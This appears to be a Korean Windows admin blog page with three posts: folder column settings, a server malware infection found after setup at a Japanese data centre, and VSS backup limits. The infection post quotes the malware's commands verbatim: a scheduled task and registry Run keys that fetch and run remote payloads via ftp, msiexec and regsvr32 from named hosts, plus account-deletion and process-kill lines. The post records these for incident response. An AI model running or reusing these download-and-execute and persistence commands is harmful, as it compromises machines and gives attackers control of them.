폴더 항목 표시 정보 변경
웹을 통해서 파일을 다운로드 하면, 기본적으로 Downloads 폴더에 저장이 된다.
그런데 간혹 기본으로 설정되어 있던 폴더 항목이 지멋대로 변경되는 경우가 있다.
웹에서 음악 파일 등을 다운로드해서 저장을 한 적이 있는데, 그 때 좀 많이 받았었는지 폴더의 속성이 음악 폴더로 변경이 되어 버렸다.
나중에는 다운로드 된 파일 및 폴더 속성 확인이 어려워지는 지경에 이르렀다.
이럴 때에는 아래와 같은 방법으로 수정을 하면 된다.
1. 폴더의 상단에 표시되는 항목에 마우스 우클릭 한 후 체크 된 항목을 전부 해제한다.
2. 다시 상단 항목에 마우스 우클릭 한 후 필요한 항목을 선택 한다.
이렇게 폴더 항목 표시 정보를 변경을 할 수 있다.
'윈도우 이야기' 카테고리의 다른 글
| Windows Server 2025 Preview 설치 테스트 (0) | 2024.06.18 |
|---|---|
| 끝이나지 않는 랜섬웨어 / Ransom:Win32/WannaCrypt.A!rsm (0) | 2018.04.07 |
끝이나지 않는 랜섬웨어 / Ransom:Win32/WannaCrypt.A!rsm
일본 IDC 에 있는 블레이드 서버 장비에 Windows 2008 R2 OS 를 3대 설치했다.
혹시나 예전처럼 랜섬웨어가 걸릴까 했는데, 역시나 였다.
네트워크를 연결하는 순간 바로 걸려 버렸다.
OS 버전에 따른 취약점이 있는 건지, 나중에 상위 버전의 OS 를 설치 후 테스트를 진행해야 겠다.
암튼 일본쪽 네트워크는 회생 불능인것 같다. 가능하면 일본쪽은 사용 안하는것이 좋겠다.
이번에 확인 된 내용을 확인해 봤는데, 저번에 감염 된 내용하고는 조금 다른 부분이 있다.
해커놈들이 침해 파일의 내용 및 배포 경로를 수정하고 있는 것 같다.
윈도우 보안업데이트를 진행해도 원천적으로는 막을 수가 없는 것 같다. 일일이 찾아서 삭제하지 않는 이상은 처리가 안 된다.
아래는 이번에 파악 된 내용의 결과이다.
1. 작업 스케쥴러 등록
이름 : Mysa
트리거 : 서비스 시작시
동작 : cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
2. 레지스트리 등록
키 이름 : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
데이터 : start1 msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q
3. 공격 파일 내용
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
ok[1].txt
[down]
http://78.142.29.114:8888/close.bat C:\windows\debug\c.bat 0
[cmd]
net1 start schedule
net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe&taskkill /f /im Update64.exe&del c:\windows\dell\Update64.exe
taskkill /f /im misiai.exe&del misiai.exe&del c:\windows\RichDllt.dll&net1 user asp.net /del&taskkill /f /im winhost.exe&del c:\windows\winhost.exe&del c:\windows\updat.exe
taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del
schtasks /create /tn "Mysa" /tr "cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe" /ru "system" /sc onstart /F
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.5b6b7b.ru:280/v.sct scrobj.dll" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q" /f
echo 123>>1.txt&start C:\windows\debug\c.bat&start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
네트워크를 통해서 바로 감염이 되기 때문에, 최신 업데이트가 완료 된 백신을 로컬을 통해 먼저 설치 하고 네트워크 연결을 시도해야 하는 수 밖에 없는 것 같다.
그런데 이 방식은 거의 불가능하므로, 사후 대책을 진행해야 한다.
우선 윈도우 방화벽에서 인,아웃바운드 정책에 대해 재설정을 진행 했다.
백신도 실시간 감지 동작을 제거로 변경 하였다.
IDC 내에서 세팅을 진행하는 것이 아닌, 외부에서 세팅을 하고 서버를 반입 시키는게 가장 좋은 방법 인 것 같다.
일본쪽은 글러먹었다.
'윈도우 이야기' 카테고리의 다른 글
| Windows Server 2025 Preview 설치 테스트 (0) | 2024.06.18 |
|---|---|
| 폴더 항목 표시 정보 변경 (0) | 2018.04.11 |
Windows Server 2008 이상의 OS 가 설치 된 서버 중 VSS 백업 복사본이 당일 하루치 또는 5일 이내의 복사본만 생성되는 경우가 간혹 발생한다.
섀도우 복사본 및 VSS 백업 카탈로그 전부 삭제 후, 백업 스케쥴 재생성하여도 동일한 경우가 있다.
백업 파티션의 사용 가능 용량이 1TB 이상이 남아 있더라도 사용 가능한 백업 복사본이 소량만 생성되는 경우에 대한 해결 방법을 확인한다.
구글링시 입력한 검색어 : vss backup available 1 copy
뭐, 이런저런 문제 해결 방법들이 나열되어 있으나 당장 활용이 가능한 방법은 아래와 같다.
# 섀도 복사본 최대 크기 변경
내 컴퓨터 - 아무 디스크 선택 - 우클릭 - 속성 - 섀도 복사본 - 볼륨 "시스템 예약 파티션" 선택 - 설정 에 진입 후 확인시,
Default 로 "제한 사용" 으로 설정이 되어 있다.
이 설정을 "제한 없음" 으로 변경을 하면 대부분 문제 해결이 가능하다.
위와 같은 방법을 통해서도 해결이 되지 않으면, 백업 디스크 교체를 진행하는 것을 권장 한다.
'윈도우 이야기 > Etc' 카테고리의 다른 글
| Windows Server 2008 R2 디스크 정리 실행 방법 (0) | 2018.05.03 |
|---|---|
| 윈도우 VSS 네트워크 백업 복구 테스트 (0) | 2018.04.20 |
| 트로이목마 바이러스 감염 및 조치 (ftp.oo000oo.me, lsmosee.exe) (7) | 2017.08.18 |
| route delete (0) | 2017.06.07 |
| 윈도우 VSS 백업 목록 확인 및 삭제 (0) | 2017.05.19 |
